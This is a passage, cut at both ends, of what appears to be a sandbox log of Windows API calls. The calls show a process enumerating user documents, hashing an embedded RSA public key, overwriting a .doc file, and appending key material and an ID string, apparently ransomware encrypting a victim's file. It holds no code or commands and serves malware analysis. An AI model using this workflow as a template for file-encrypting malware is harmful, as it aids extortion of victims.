(lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.416] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15eda4b0, ftCreationTime.dwHighDateTime=0x1d899ac, ftLastAccessTime.dwLowDateTime=0xc0470410, ftLastAccessTime.dwHighDateTime=0x1d89de9, ftLastWriteTime.dwLowDateTime=0xc0470410, ftLastWriteTime.dwHighDateTime=0x1d89de9, nFileSizeHigh=0x0, nFileSizeLow=0xa5ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NxH6NL2Af5s5IGX.doc", cAlternateFileName="NXH6NL~1.DOC")) returned 1 [0196.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.417] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\NxH6NL2Af5s5IGX.doc") returned=".doc" [0196.417] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\NxH6NL2Af5s5IGX.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\nxh6nl2af5s5igx.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.418] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=42474) returned 1 [0196.418] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.421] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xa5c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.421] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.424] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.424] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xa5ea, lpOverlapped=0x0) returned 1 [0196.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.425] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.426] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.426] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.426] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.426] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.426] GetLastError () returned 0x0 [0196.427] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.427] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.427] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.427] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.427] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa5f0) returned 0x2ea79b0 [0196.428] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea17b8 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1800 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.429] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e88 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2e70 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.434] GetCurrentThreadId () returned 0x66c [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea52f0 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.435] GetCurrentThreadId () returned 0x66c [0196.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e88 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ee8 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f00 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ea0 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e70 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0196.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1800 | out: hHeap=0x620000) returned 1 [0196.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.445] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xa5e5, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xa5e5, lpOverlapped=0x0) returned 1 [0196.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.446] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xa5ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.447] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.448] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 